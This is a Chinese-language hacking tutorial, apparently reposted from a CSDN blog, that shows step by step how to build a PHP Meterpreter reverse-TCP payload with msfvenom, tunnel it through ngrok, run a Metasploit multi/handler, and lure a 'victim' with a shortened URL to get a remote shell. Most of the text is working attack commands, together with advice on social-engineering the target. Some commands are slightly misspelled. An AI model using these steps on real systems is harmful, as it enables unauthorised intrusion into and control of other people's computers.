标签：负载 php ABPET TCP msf PHP com ngrok

使用PHP有效负载和ngrok 进行黑客攻击

我们将使用PHP有效负载进行黑客攻击，在本教程中我们将使用msfvenom(其实就是MSF)。

Msfvenom包含在kali linux操作系统中

工具准备阶段

• 步骤1：安装ngrok

请按照说明书安装ngrok。

让我们从下载ngrok开始。在这里下载ngrok。https://ngrok.com/download.

一旦ngrok完成下载，解压缩Zip存档，然后将cd放入其中，例如“cd ngrok”。

cd ngrok

安装AuthToken(下面的auth代码是从ngrok.com帐户复制auth令牌的示例)。复制ngrok.com帐户中的身份验证代码，我们将使用该代码对隧道进行身份验证。您可以通过进入存储和使用ngrok的文件夹。“/ngrok authToken yourauthTokenhere”将保存身份验证代码。
例子

./ngrok authtoken UHTsJVmnmrninfibyuvtc_2b9xscccvdvdfsaq8f7z3

现在我们将创建一个安全的TCP隧道，打开一个新的TCP终端，键入ngrok TCP 4545，将端口号更改为您想使用的任何端口。

创建PHP有效负载

现在我们将使用msfvenom来创建PHP有效负载。

打开一个新的命令终端，在下面输入命令，将LPORT更改为启动ngrok时指定的端口。

msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=17928 R > home.php

启动多/处理程序

在新的命令终端中输入命令。

service postgrsql start
service apache2 start

将下面的命令输入终端

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 127.0.0.1
set port 17928

将php文件复制到/var/www/html

键入msf控制台终端中的漏洞。

缩短URL

访问tinyurl.com并缩短网址。
例如127.0.0.1：17928

向受害者发送缩短的微URL链接，因为我们是在本地环境中工作的，所以不用再输入网址，直接输入IP地址和后面的端口号访问就行
当你使用MSF发起攻击后，如果对方计算机访问了你的PHP网站，那么它将会被植入一个PHP级别的监听TCP程序并且激活，你就成功2获得了一个SHELL，接下来的工作不做介绍。

原理

通过使计算机访问指定微URL（IP）是对方计算机植入并且激活了网页自带的挂马，并且创建TCP反向会话连接，已达到反弹SHELL的目的来入侵目标计算机

​

标签：负载,php,ABPET,TCP,msf,PHP,com,ngrok
来源： https://blog.csdn.net/qq_43504064/article/details/100748500

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。